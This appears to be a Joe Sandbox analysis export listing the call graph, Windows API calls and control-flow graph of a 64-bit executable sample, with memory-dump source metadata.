CreateFileW GetFinalPathNameByHandleW CloseHandle 22043->22161 22045 7ff7691ab870 _log10_special 8 API calls 22048 7ff7691a34dd 22045->22048 22047 7ff7691a34b3 22050 7ff7691a342e 22047->22050 22164 7ff7691a26c0 49 API calls _log10_special 22047->22164 22048->21918 22056 7ff7691a18f0 22048->22056 22049 7ff7691a3458 22051 7ff7691a3474 __vcrt_FlsAlloc 22049->22051 22052 7ff7691a345c 22049->22052 22050->22045 22051->22042 22162 7ff7691a26c0 49 API calls _log10_special 22052->22162 22055 7ff7691a346d 22055->22050 22057 7ff7691a3f70 108 API calls 22056->22057 22058 7ff7691a1925 22057->22058 22059 7ff7691a1bb6 22058->22059 22060 7ff7691a76a0 83 API calls 22058->22060 22061 7ff7691ab870 _log10_special 8 API calls 22059->22061 22062 7ff7691a196b 22060->22062 22063 7ff7691a1bd1 22061->22063 22064 7ff7691af9f4 73 API calls 22062->22064 22095 7ff7691a199c 22062->22095 22063->21923 22063->21924 22066 7ff7691a1985 22064->22066 22065 7ff7691af36c 74 API calls 22065->22059 22067 7ff7691a19a1 22066->22067 22068 7ff7691a1989 22066->22068 22070 7ff7691af6bc _fread_nolock 53 API calls 22067->22070 22165 7ff7691a2760 53 API calls 2 library calls 22068->22165 22071 7ff7691a19b9 22070->22071 22072 7ff7691a19bf 22071->22072 22073 7ff7691a19d7 22071->22073 22166 7ff7691a2760 53 API calls 2 library calls 22072->22166 22075 7ff7691a1a06 22073->22075 22076 7ff7691a19ee 22073->22076 22078 7ff7691a1bf0 49 API calls 22075->22078 22167 7ff7691a2760 53 API calls 2 library calls 22076->22167 22079 7ff7691a1a1d 22078->22079 22080 7ff7691a1bf0 49 API calls 22079->22080 22081 7ff7691a1a68 22080->22081 22082 7ff7691af9f4 73 API calls 22081->22082 22083 7ff7691a1a8c 22082->22083 22084 7ff7691a1aa1 22083->22084 22085 7ff7691a1ab9 22083->22085 22168 7ff7691a2760 53 API calls 2 library calls 22084->22168 22086 7ff7691af6bc _fread_nolock 53 API calls 22085->22086 22088 7ff7691a1ace 22086->22088 22089 7ff7691a1ad4 22088->22089 22090 7ff7691a1aec 22088->22090 22169 7ff7691a2760 53 API calls 2 library calls 22089->22169 22170 7ff7691af430 22090->22170 22095->22065 22097 7ff7691a7e1a 22096->22097 22098 7ff7691a86b0 2 API calls 22097->22098 22099 7ff7691a7e39 GetEnvironmentVariableW 22098->22099 22100 7ff7691a7ea2 22099->22100 22101 7ff7691a7e56 ExpandEnvironmentStringsW 22099->22101 22103 7ff7691ab870 _log10_special 8 API calls 22100->22103 22101->22100 22102 7ff7691a7e78 22101->22102 22179 7ff7691a8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 22102->22179 22105 7ff7691a7eb4 22103->22105 22105->21933 22106 7ff7691a7e8a 22107 7ff7691ab870 _log10_special 8 API calls 22106->22107 22108 7ff7691a7e9a 22107->22108 22108->21933 22180 7ff7691a5af0 22109->22180 22113 7ff7691a30a1 22117 7ff7691a30b9 22113->22117 22250 7ff7691a5800 22113->22250 22115 7ff7691a30ad 22115->22117 22259 7ff7691a5990 53 API calls 22115->22259 22118 7ff7691a33a0 22117->22118 22119 7ff7691a33ae 22118->22119 22120 7ff7691a33bf 22119->22120 22322 7ff7691a8180 FreeLibrary 22119->22322 22150 7ff7691a6780 FreeLibrary 22120->22150 22122->21949 22123->21918 22125 7ff7691a76c4 22124->22125 22126 7ff7691af9f4 73 API calls 22125->22126 22131 7ff7691a779b __std_exception_copy 22125->22131 22127 7ff7691a76e0 22126->22127 22127->22131 22323 7ff7691b6bd8 22127->22323 22129 7ff7691af9f4 73 API calls 22132 7ff7691a76f5 22129->22132 22130 7ff7691af6bc _fread_nolock 53 API calls 22130->22132 22131->21932 22132->22129 22132->22130 22132->22131 22133->21918 22134->21918 22135->21960 22136->21971 22137->21944 22139 7ff7691a1bf0 49 API calls 22138->22139 22140 7ff7691a4010 22139->22140 22140->21973 22141->21972 22142->21977 22143->21981 22144->21987 22145->21993 22146->21997 22147->21979 22148->21992 22150->21991 22151->22033 22152->22033 22154 7ff7691a33ec GetModuleFileNameW 22153->22154 22154->22037 22154->22038 22156 7ff7691a85f2 22155->22156 22157 7ff7691a85df FindClose 22155->22157 22158 7ff7691ab870 _log10_special 8 API calls 22156->22158 22157->22156 22159 7ff7691a3442 22158->22159 22159->22042 22159->22043 22160->22050 22161->22049 22162->22055 22163->22047 22164->22050 22165->22095 22166->22095 22167->22095 22168->22095 22169->22095 22171 7ff7691af439 22170->22171 22172 7ff7691a1b06 22170->22172 22177 7ff7691b43f4 11 API calls _get_daylight 22171->22177 22172->22095 22176 7ff7691a25f0 53 API calls _log10_special 22172->22176 22174 7ff7691af43e 22178 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 22174->22178 22176->22095 22177->22174 22178->22172 22179->22106 22181 7ff7691a5b05 22180->22181 22182 7ff7691a1bf0 49 API calls 22181->22182 22183 7ff7691a5b41 22182->22183 22184 7ff7691a5b4a 22183->22184 22185 7ff7691a5b6d 22183->22185 22270 7ff7691a25f0 53 API calls _log10_special 22184->22270 22187 7ff7691a3fe0 49 API calls 22185->22187 22189 7ff7691a5b85 22187->22189 22188 7ff7691a5b63 22191 7ff7691ab870 _log10_special 8 API calls 22188->22191 22190 7ff7691a5ba3 22189->22190 22271 7ff7691a25f0 53 API calls _log10_special 22189->22271 22260 7ff7691a3f10 22190->22260 22194 7ff7691a308e 22191->22194 22194->22117 22211 7ff7691a5c80 22194->22211 22196 7ff7691a5bbb 22197 7ff7691a3fe0 49 API calls 22196->22197 22199 7ff7691a5bd4 22197->22199 22198 7ff7691a81a0 3 API calls 22198->22196 22200 7ff7691a5bf9 22199->22200 22201 7ff7691a5bd9 22199->22201 22266 7ff7691a81a0 22200->22266 22272 7ff7691a25f0 53 API calls _log10_special 22201->22272 22204 7ff7691a5c06 22205 7ff7691a5c12 22204->22205 22206 7ff7691a5c49 22204->22206 22207 7ff7691a86b0 2 API calls 22205->22207 22274 7ff7691a50b0 95 API calls 22206->22274 22209 7ff7691a5c2a 22207->22209 22273 7ff7691a29e0 51 API calls _log10_special 22209->22273 22275 7ff7691a4c80 22211->22275 22213 7ff7691a5cba 22214 7ff7691a5cc2 22213->22214 22215 7ff7691a5cd3 22213->22215 22307 7ff7691a25f0 53 API calls _log10_special 22214->22307 22282 7ff7691a4450 22215->22282 22219 7ff7691a5cf0 22223 7ff7691a5d10 22219->22223 22224 7ff7691a5cff 22219->22224 22220 7ff7691a5cdf 22308 7ff7691a25f0 53 API calls _log10_special 22220->22308 22222 7ff7691a5cce 22222->22113 22286 7ff7691a4700 22223->22286 22309 7ff7691a25f0 53 API calls _log10_special 22224->22309 22227 7ff7691a5d2b 22228 7ff7691a5d40 22227->22228 22229 7ff7691a5d2f 22227->22229 22231 7ff7691a5d60 22228->22231 22232 7ff7691a5d4f 22228->22232 22310 7ff7691a25f0 53 API calls _log10_special 22229->22310 22293 7ff7691a45a0 22231->22293 22311 7ff7691a25f0 53 API calls _log10_special 22232->22311 22236 7ff7691a5d6f 22312 7ff7691a25f0 53 API calls _log10_special 22236->22312 22238 7ff7691a5d80 22239 7ff7691a5da0 22238->22239 22240 7ff7691a5d8f 22238->22240 22242 7ff7691a5db1 22239->22242 22244 7ff7691a5dc2 22239->22244 22313 7ff7691a25f0 53 API calls _log10_special 22240->22313 22314 7ff7691a25f0 53 API calls _log10_special 22242->22314 22247 7ff7691a5dec 22244->22247 22315 7ff7691b65c0 73 API calls 22244->22315 22246 7ff7691a5dda 22316 7ff7691b65c0 73 API calls 22246->22316 22247->22222 22317 7ff7691a25f0 53 API calls _log10_special 22247->22317 22251 7ff7691a5820 22250->22251 22251->22251 22252 7ff7691a5849 22251->22252 22257 7ff7691a5860 __std_exception_copy 22251->22257 22321 7ff7691a25f0 53 API calls _log10_special 22252->22321 22254 7ff7691a5855 22254->22115 22255 7ff7691a1440 116 API calls 22255->22257 22256 7ff7691a25f0 53 API calls 22256->22257 22257->22255 22257->22256 22258 7ff7691a596b 22257->22258 22258->22115 22259->22117 22261 7ff7691a3f1a 22260->22261 22262 7ff7691a86b0 2 API calls 22261->22262 22263 7ff7691a3f3f 22262->22263 22264 7ff7691ab870 _log10_special 8 API calls 22263->22264 22265 7ff7691a3f67 22264->22265 22265->22196 22265->22198 22267 7ff7691a86b0 2 API calls 22266->22267 22268 7ff7691a81b4 LoadLibraryW 22267->22268 22269 7ff7691a81d3 __std_exception_copy 22268->22269 22269->22204 22270->22188 22271->22190 22272->22188 22273->22188 22274->22188 22277 7ff7691a4cac 22275->22277 22276 7ff7691a4cb4 22276->22213 22277->22276 22280 7ff7691a4e54 22277->22280 22318 7ff7691b5db4 48 API calls 22277->22318 22278 7ff7691a5017 __std_exception_copy 22278->22213 22279 7ff7691a4180 47 API calls 22279->22280 22280->22278 22280->22279 22283 7ff7691a4480 22282->22283 22284 7ff7691ab870 _log10_special 8 API calls 22283->22284 22285 7ff7691a44ea 22284->22285 22285->22219 22285->22220 22287 7ff7691a476f 22286->22287 22291 7ff7691a471b 22286->22291 22320 7ff7691a4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 22287->22320 22289 7ff7691a477c 22289->22227 22292 7ff7691a475a 22291->22292 22319 7ff7691a4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 22291->22319 22292->22227 22294 7ff7691a45b5 22293->22294 22295 7ff7691a1bf0 49 API calls 22294->22295 22296 7ff7691a4601 22295->22296 22297 7ff7691a1bf0 49 API calls 22296->22297 22306 7ff7691a4687 __std_exception_copy 22296->22306 22299 7ff7691a4640 22297->22299 22298 7ff7691ab870 _log10_special 8 API calls 22300 7ff7691a46dc 22298->22300 22301 7ff7691a86b0 2 API calls 22299->22301 22299->22306 22300->22236 22300->22238 22302 7ff7691a465a 22301->22302 22303 7ff7691a86b0 2 API calls 22302->22303 22304 7ff7691a4671 22303->22304 22305 7ff7691a86b0 2 API calls 22304->22305 22305->22306 22306->22298 22307->22222 22308->22222 22309->22222 22310->22222 22311->22222 22312->22222 22313->22222 22314->22222 22315->22246 22316->22247 22317->22222 22318->22277 22319->22292 22320->22289 22321->22254 22322->22120 22324 7ff7691b6c08 22323->22324 22327 7ff7691b66e4 22324->22327 22326 7ff7691b6c21 22326->22132 22328 7ff7691b66ff 22327->22328 22329 7ff7691b672e 22327->22329 22338 7ff7691b9b24 37 API calls 2 library calls 22328->22338 22337 7ff7691b477c EnterCriticalSection 22329->22337 22332 7ff7691b671f 22332->22326 22333 7ff7691b6733 22334 7ff7691b6750 38 API calls 22333->22334 22335 7ff7691b673f 22334->22335 22336 7ff7691b4788 _fread_nolock LeaveCriticalSection 22335->22336 22336->22332 22338->22332 22362 7ffe1330faf8 21 API calls 2 library calls 22363 7ff7691bb870 12 API calls 22411 7ff7691be570 FreeLibrary 22412 7ff7691c0770 55 API calls 3 library calls 22364 7ff7691abe70 57 API calls 2 library calls 22416 7ff7691c09c0 74 API calls 2 library calls 22369 7ffe1330fe10 RtlUnwindEx __C_specific_handler __GSHandlerCheckCommon 22370 7ff7691ac0d0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 22419 7ff7691c8fcc 55 API calls __CxxCallCatchBlock 22341 7ff7691a9ca3 24 API calls 22421 7ff7691bf5a0 7 API calls 22423 7ffe133062d0 20 API calls __unDName 22424 7ffe133024d0 13 API calls __CxxRegisterExceptionObject 22373 7ff7691bec9c 55 API calls 3 library calls 22374 7ffe1330fa38 38 API calls __CxxRegisterExceptionObject 22428 7ff7691ae5a8 59 API calls 5 library calls 21428 7ff7691a2d00 21429 7ff7691a2d10 21428->21429 21430 7ff7691a2d61 21429->21430 21431 7ff7691a2d4b 21429->21431 21433 7ff7691a2d81 21430->21433 21444 7ff7691a2d97 __std_exception_copy 21430->21444 21484 7ff7691a25f0 53 API calls _log10_special 21431->21484 21485 7ff7691a25f0 53 API calls _log10_special 21433->21485 21436 7ff7691a2d57 __std_exception_copy 21486 7ff7691ab870 21436->21486 21439 7ff7691a3069 21501 7ff7691a25f0 53 API calls _log10_special 21439->21501 21442 7ff7691a3053 21500 7ff7691a25f0 53 API calls _log10_special 21442->21500 21444->21436 21444->21439 21444->21442 21445 7ff7691a302d 21444->21445 21447 7ff7691a2f27 21444->21447 21456 7ff7691a1440 21444->21456 21480 7ff7691a1bf0 21444->21480 21499 7ff7691a25f0 53 API calls _log10_special 21445->21499 21448 7ff7691a2f93 21447->21448 21495 7ff7691b9714 37 API calls 2 library calls 21447->21495 21450 7ff7691a2fb0 21448->21450 21451 7ff7691a2fbe 21448->21451 21496 7ff7691b9714 37 API calls 2 library calls 21450->21496 21497 7ff7691a2af0 37 API calls 21451->21497 21454 7ff7691a2fbc 21498 7ff7691a2470 54 API calls __std_exception_copy 21454->21498 21502 7ff7691a3f70 21456->21502 21459 7ff7691a148c 21512 7ff7691af9f4 21459->21512 21460 7ff7691a146b 21538 7ff7691a25f0 53 API calls _log10_special 21460->21538 21463 7ff7691a14a1 21465 7ff7691a14c1 21463->21465 21466 7ff7691a14a5 21463->21466 21464 7ff7691a147b 21464->21444 21468 7ff7691a14f1 21465->21468 21469 7ff7691a14d1 21465->21469 21539 7ff7691a2760 53 API calls 2 library calls 21466->21539 21472 7ff7691a14f7 21468->21472 21475 7ff7691a150a 21468->21475 21540 7ff7691a2760 53 API calls 2 library calls 21469->21540 21516 7ff7691a11f0 21472->21516 21473 7ff7691a1584 21473->21444 21477 7ff7691a1596 21475->21477 21478 7ff7691a14bc __std_exception_copy 21475->21478 21541 7ff7691af6bc 21475->21541 21544 7ff7691a2760 53 API calls 2 library calls 21477->21544 21534 7ff7691af36c 21478->21534 21481 7ff7691a1c15 21480->21481 21783 7ff7691b3ca4 21481->21783 21484->21436 21485->21436 21487 7ff7691ab879 21486->21487 21488 7ff7691a2f1a 21487->21488 21489 7ff7691abc00 IsProcessorFeaturePresent 21487->21489 21490 7ff7691abc18 21489->21490 21806 7ff7691abdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 21490->21806 21492 7ff7691abc2b 21807 7ff7691abbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21492->21807 21495->21448 21496->21454 21497->21454 21498->21436 21499->21436 21500->21436 21501->21436 21503 7ff7691a3f7c 21502->21503 21545 7ff7691a86b0 21503->21545 21505 7ff7691a3fa4 21506 7ff7691a86b0 2 API calls 21505->21506 21507 7ff7691a3fb7 21506->21507 21550 7ff7691b52a4 21507->21550 21510 7ff7691ab870 _log10_special 8 API calls 21511 7ff7691a1463 21510->21511 21511->21459 21511->21460 21513 7ff7691afa24 21512->21513 21718 7ff7691af784 21513->21718 21515 7ff7691afa3d 21515->21463 21517 7ff7691a1248 21516->21517 21518 7ff7691a124f 21517->21518 21519 7ff7691a1277 21517->21519 21735 7ff7691a25f0 53 API calls _log10_special 21518->21735 21522 7ff7691a1291 21519->21522 21523 7ff7691a12ad 21519->21523 21521 7ff7691a1262 21521->21478 21736 7ff7691a2760 53 API calls 2 library calls 21522->21736 21525 7ff7691a12bf 21523->21525 21533 7ff7691a12db memcpy_s 21523->21533 21737 7ff7691a2760 53 API calls 2 library calls 21525->21737 21527 7ff7691af6bc _fread_nolock 53 API calls 21527->21533 21528 7ff7691a12a8 __std_exception_copy 21528->21478 21529 7ff7691af430 37 API calls 21529->21533 21530 7ff7691a139f 21738 7ff7691a25f0 53 API calls _log10_special 21530->21738 21533->21527 21533->21528 21533->21529 21533->21530 21731 7ff7691afdfc 21533->21731 21535 7ff7691af39c 21534->21535 21755 7ff7691af148 21535->21755 21537 7ff7691af3b5 21537->21473 21538->21464 21539->21478 21540->21478 21767 7ff7691af6dc 21541->21767 21544->21478 21546 7ff7691a86d2 MultiByteToWideChar 21545->21546 21547 7ff7691a86f6 21545->21547 21546->21547 21548 7ff7691a870c __std_exception_copy 21546->21548 21547->21548 21549 7ff7691a8713 MultiByteToWideChar 21547->21549 21548->21505 21549->21548 21551 7ff7691b51d8 21550->21551 21552 7ff7691b51fe 21551->21552 21555 7ff7691b5231 21551->21555 21581 7ff7691b43f4 11 API calls _get_daylight 21552->21581 21554 7ff7691b5203 21582 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 21554->21582 21557 7ff7691b5244 21555->21557 21558 7ff7691b5237 21555->21558 21569 7ff7691b9f38 21557->21569 21583 7ff7691b43f4 11 API calls _get_daylight 21558->21583 21561 7ff7691a3fc6 21561->21510 21563 7ff7691b5265 21576 7ff7691bf1dc 21563->21576 21564 7ff7691b5258 21584 7ff7691b43f4 11 API calls _get_daylight 21564->21584 21567 7ff7691b5278 21585 7ff7691b4788 LeaveCriticalSection 21567->21585 21586 7ff7691bf5e8 EnterCriticalSection 21569->21586 21571 7ff7691b9f4f 21572 7ff7691b9fac 19 API calls 21571->21572 21573 7ff7691b9f5a 21572->21573 21574 7ff7691bf648 _isindst LeaveCriticalSection 21573->21574 21575 7ff7691b524e 21574->21575 21575->21563 21575->21564 21587 7ff7691beed8 21576->21587 21579 7ff7691bf236 21579->21567 21581->21554 21582->21561 21583->21561 21584->21561 21588 7ff7691bef13 __vcrt_FlsAlloc 21587->21588 21597 7ff7691bf0da 21588->21597 21602 7ff7691b6d4c 51 API calls 3 library calls 21588->21602 21590 7ff7691bf1b1 21606 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 21590->21606 21592 7ff7691bf0e3 21592->21579 21599 7ff7691c6064 21592->21599 21594 7ff7691bf145 21594->21597 21603 7ff7691b6d4c 51 API calls 3 library calls 21594->21603 21596 7ff7691bf164 21596->21597 21604 7ff7691b6d4c 51 API calls 3 library calls 21596->21604 21597->21592 21605 7ff7691b43f4 11 API calls _get_daylight 21597->21605 21607 7ff7691c5664 21599->21607 21602->21594 21603->21596 21604->21597 21605->21590 21606->21592 21608 7ff7691c5699 21607->21608 21609 7ff7691c567b 21607->21609 21608->21609 21612 7ff7691c56b5 21608->21612 21661 7ff7691b43f4 11 API calls _get_daylight 21609->21661 21611 7ff7691c5680 21662 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 21611->21662 21618 7ff7691c5c74 21612->21618 21616 7ff7691c568c 21616->21579 21664 7ff7691c59a8 21618->21664 21621 7ff7691c5d01 21684 7ff7691b7830 21621->21684 21622 7ff7691c5ce9 21696 7ff7691b43d4 11 API calls _get_daylight 21622->21696 21639 7ff7691c56e0 21639->21616 21663 7ff7691b7808 LeaveCriticalSection 21639->21663 21641 7ff7691c5cee 21697 7ff7691b43f4 11 API calls _get_daylight 21641->21697 21661->21611 21662->21616 21665 7ff7691c59d4 21664->21665 21672 7ff7691c59ee 21664->21672 21665->21672 21709 7ff7691b43f4 11 API calls _get_daylight 21665->21709 21667 7ff7691c59e3 21710 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 21667->21710 21669 7ff7691c5abd 21683 7ff7691c5b1a 21669->21683 21715 7ff7691b8e90 37 API calls 2 library calls 21669->21715 21670 7ff7691c5a6c 21670->21669 21713 7ff7691b43f4 11 API calls _get_daylight 21670->21713 21672->21670 21711 7ff7691b43f4 11 API calls _get_daylight 21672->21711 21674 7ff7691c5b16 21679 7ff7691c5b98 21674->21679 21674->21683 21676 7ff7691c5ab2 21714 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 21676->21714 21677 7ff7691c5a61 21712 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 21677->21712 21716 7ff7691b9c10 17 API calls __CxxCallCatchBlock 21679->21716 21683->21621 21683->21622 21717 7ff7691bf5e8 EnterCriticalSection 21684->21717 21696->21641 21697->21639 21709->21667 21710->21672 21711->21677 21712->21670 21713->21676 21714->21669 21715->21674 21719 7ff7691af7ee 21718->21719 21720 7ff7691af7ae 21718->21720 21719->21720 21722 7ff7691af7fa 21719->21722 21730 7ff7691b9b24 37 API calls 2 library calls 21720->21730 21729 7ff7691b477c EnterCriticalSection 21722->21729 21723 7ff7691af7d5 21723->21515 21725 7ff7691af7ff 21726 7ff7691af908 71 API calls 21725->21726 21727 7ff7691af811 21726->21727 21728 7ff7691b4788 _fread_nolock LeaveCriticalSection 21727->21728 21728->21723 21730->21723 21732 7ff7691afe2c 21731->21732 21739 7ff7691afb4c 21732->21739 21734 7ff7691afe4a 21734->21533 21735->21521 21736->21528 21737->21528 21738->21528 21740 7ff7691afb99 21739->21740 21741 7ff7691afb6c 21739->21741 21740->21734 21741->21740 21742 7ff7691afba1 21741->21742 21743 7ff7691afb76 21741->21743 21746 7ff7691afa8c 21742->21746 21753 7ff7691b9b24 37 API calls 2 library calls 21743->21753 21754 7ff7691b477c EnterCriticalSection 21746->21754 21748 7ff7691afaa9 21749 7ff7691afacc 74 API calls 21748->21749 21750 7ff7691afab2 21749->21750 21751 7ff7691b4788 _fread_nolock LeaveCriticalSection 21750->21751 21752 7ff7691afabd 21751->21752 21752->21740 21753->21740 21756 7ff7691af191 21755->21756 21757 7ff7691af163 21755->21757 21764 7ff7691af183 21756->21764 21765 7ff7691b477c EnterCriticalSection 21756->21765 21766 7ff7691b9b24 37 API calls 2 library calls 21757->21766 21760 7ff7691af1a8 21761 7ff7691af1c4 72 API calls 21760->21761 21762 7ff7691af1b4 21761->21762 21763 7ff7691b4788 _fread_nolock LeaveCriticalSection 21762->21763 21763->21764 21764->21537 21766->21764 21768 7ff7691af706 21767->21768 21769 7ff7691af6d4 21767->21769 21768->21769 21770 7ff7691af752 21768->21770 21771 7ff7691af715 __scrt_get_show_window_mode 21768->21771 21769->21475 21780 7ff7691b477c EnterCriticalSection 21770->21780 21781 7ff7691b43f4 11 API calls _get_daylight 21771->21781 21773 7ff7691af75a 21775 7ff7691af45c _fread_nolock 51 API calls 21773->21775 21777 7ff7691af771 21775->21777 21776 7ff7691af72a 21782 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 21776->21782 21779 7ff7691b4788 _fread_nolock LeaveCriticalSection 21777->21779 21779->21769 21781->21776 21782->21769 21785 7ff7691b3cfe 21783->21785 21784 7ff7691b3d23 21801 7ff7691b9b24 37 API calls 2 library calls 21784->21801 21785->21784 21787 7ff7691b3d5f 21785->21787 21802 7ff7691b1f30 49 API calls _invalid_parameter_noinfo 21787->21802 21789 7ff7691b3e3c 21805 7ff7691b9c58 11 API calls 2 library calls 21789->21805 21791 7ff7691b3d4d 21792 7ff7691ab870 _log10_special 8 API calls 21791->21792 21794 7ff7691a1c38 21792->21794 21793 7ff7691b3df6 21793->21789 21795 7ff7691b3e11 21793->21795 21796 7ff7691b3e60 21793->21796 21797 7ff7691b3e08 21793->21797 21794->21444 21803 7ff7691b9c58 11 API calls 2 library calls 21795->21803 21796->21789 21798 7ff7691b3e6a 21796->21798 21797->21789 21797->21795 21804 7ff7691b9c58 11 API calls 2 library calls 21798->21804 21801->21791 21802->21793 21803->21791 21804->21791 21805->21791 21806->21492 22432 7ffe13302530 terminate 22433 7ffe13306530 14 API calls __CxxRegisterExceptionObject 21864 7ff7691a95fb 12 API calls 22376 7ff7691af110 GetCommandLineA GetCommandLineW 22377 7ffe13304424 malloc strcpy_s free 22435 7ffe13304520 14 API calls 4 library calls 22436 7ffe13305520 23 API calls 5 library calls 22380 7ffe1330e9e0 15 API calls 2 library calls 22381 7ffe1330461a 15 API calls 2 library calls 22438 7ff7691b45e0 17 API calls 2 library calls 22439 7ff7691ae9da 55 API calls __CxxCallCatchBlock 22440 7ff7691bfbd8 77 API calls 4 library calls 22442 7ffe13304710 15 API calls 4 library calls 22383 7ff7691c9ef3 LeaveCriticalSection _fread_nolock 22444 7ffe13305f0a RtlPcToFileHeader RtlPcToFileHeader RtlPcToFileHeader RaiseException FindMITargetTypeInstance 22445 7ff7691ae7e8 37 API calls __std_exception_copy

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 7ff7691a1000-7ff7691a3536 call 7ff7691af138 call 7ff7691af140 call 7ff7691abb70 call 7ff7691b4700 call 7ff7691b4794 call 7ff7691a33e0 14 7ff7691a3544-7ff7691a3566 call 7ff7691a18f0 0->14 15 7ff7691a3538-7ff7691a353f 0->15 21 7ff7691a3736-7ff7691a374c call 7ff7691a3f70 14->21 22 7ff7691a356c-7ff7691a3583 call 7ff7691a1bf0 14->22 16 7ff7691a371a-7ff7691a3735 call 7ff7691ab870 15->16 27 7ff7691a3785-7ff7691a379a call 7ff7691a25f0 21->27 28 7ff7691a374e-7ff7691a377b call 7ff7691a76a0 21->28 26 7ff7691a3588-7ff7691a35c1 22->26 29 7ff7691a3653-7ff7691a366d call 7ff7691a7e10 26->29 30 7ff7691a35c7-7ff7691a35cb 26->30 44 7ff7691a3712 27->44 41 7ff7691a379f-7ff7691a37be call 7ff7691a1bf0 28->41 42 7ff7691a377d-7ff7691a3780 call 7ff7691af36c 28->42 45 7ff7691a366f-7ff7691a3675 29->45 46 7ff7691a3695-7ff7691a369c 29->46 34 7ff7691a3638-7ff7691a364d call 7ff7691a18e0 30->34 35 7ff7691a35cd-7ff7691a35e5 call 7ff7691b4560 30->35 34->29 34->30 54 7ff7691a35f2-7ff7691a360a call 7ff7691b4560 35->54 55 7ff7691a35e7-7ff7691a35eb 35->55 61 7ff7691a37c1-7ff7691a37ca 41->61 42->27 44->16 52 7ff7691a3682-7ff7691a3690 call 7ff7691b415c 45->52 53 7ff7691a3677-7ff7691a3680 45->53 48 7ff7691a36a2-7ff7691a36c0 call 7ff7691a7e10 call 7ff7691a7f80 46->48 49 7ff7691a3844-7ff7691a3863 call 7ff7691a3e90 46->49 78 7ff7691a380f-7ff7691a381e call 7ff7691a8400 48->78 79 7ff7691a36c6-7ff7691a36c9 48->79 69 7ff7691a3871-7ff7691a3882 call 7ff7691a1bf0 49->69 70 7ff7691a3865-7ff7691a386f call 7ff7691a3fe0 49->70 52->46 53->52 66 7ff7691a3617-7ff7691a362f call 7ff7691b4560 54->66 67 7ff7691a360c-7ff7691a3610 54->67 55->54 61->61 65 7ff7691a37cc-7ff7691a37e9 call 7ff7691a18f0 61->65 65->26 82 7ff7691a37ef-7ff7691a3800 call 7ff7691a25f0 65->82 66->34 83 7ff7691a3631 66->83 67->66 81 7ff7691a3887-7ff7691a38a1 call 7ff7691a86b0 69->81 70->81 93 7ff7691a3820 78->93 94 7ff7691a382c-7ff7691a3836 call 7ff7691a7c40 78->94 79->78 84 7ff7691a36cf-7ff7691a36f6 call 7ff7691a1bf0 79->84 95 7ff7691a38af-7ff7691a38c1 SetDllDirectoryW 81->95 96 7ff7691a38a3 81->96 82->44 83->34 100 7ff7691a3805-7ff7691a380d call 7ff7691b415c 84->100 101 7ff7691a36fc-7ff7691a3703 call 7ff7691a25f0 84->101 93->94 94->81 107 7ff7691a3838 94->107 98 7ff7691a38d0-7ff7691a38ec call 7ff7691a6560 call 7ff7691a6b00 95->98 99 7ff7691a38c3-7ff7691a38ca 95->99 96->95 118 7ff7691a3947-7ff7691a394a call 7ff7691a6510 98->118 119 7ff7691a38ee-7ff7691a38f4 98->119 99->98 103 7ff7691a3a50-7ff7691a3a58 99->103 100->81 110 7ff7691a3708-7ff7691a370a 101->110 111 7ff7691a3a5a-7ff7691a3a77 PostMessageW GetMessageW 103->111 112 7ff7691a3a7d-7ff7691a3a92 call 7ff7691a33d0 call 7ff7691a3080 call 7ff7691a33a0 103->112 107->49 110->44 111->112 128 7ff7691a3a97-7ff7691a3aaf call 7ff7691a6780 call 7ff7691a6510 112->128 126 7ff7691a394f-7ff7691a3956 118->126 121 7ff7691a38f6-7ff7691a3903 call 7ff7691a65a0 119->121 122 7ff7691a390e-7ff7691a3918 call 7ff7691a6970 119->122 121->122 135 7ff7691a3905-7ff7691a390c 121->135 132 7ff7691a3923-7ff7691a3931 call 7ff7691a6cd0 122->132 133 7ff7691a391a-7ff7691a3921 122->133 126->103 130 7ff7691a395c-7ff7691a3966 call 7ff7691a30e0 126->130 130->110 144 7ff7691a396c-7ff7691a3980 call 7ff7691a83e0 130->144 132->126 146 7ff7691a3933 132->146 137 7ff7691a393a-7ff7691a3942 call 7ff7691a2870 call 7ff7691a6780 133->137 135->137 137->118 151 7ff7691a3982-7ff7691a399f PostMessageW GetMessageW 144->151 152 7ff7691a39a5-7ff7691a39e8 call 7ff7691a7f20 call 7ff7691a7fc0 call 7ff7691a6780 call 7ff7691a6510 call 7ff7691a7ec0 144->152 146->137 151->152 163 7ff7691a39ea-7ff7691a3a00 call 7ff7691a81f0 call 7ff7691a7ec0 152->163 164 7ff7691a3a3d-7ff7691a3a4b call 7ff7691a18a0 152->164 163->164 171 7ff7691a3a02-7ff7691a3a10 163->171 164->110 172 7ff7691a3a12-7ff7691a3a2c call 7ff7691a25f0 call 7ff7691a18a0 171->172 173 7ff7691a3a31-7ff7691a3a38 call 7ff7691a2870 171->173 172->110 173->164
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
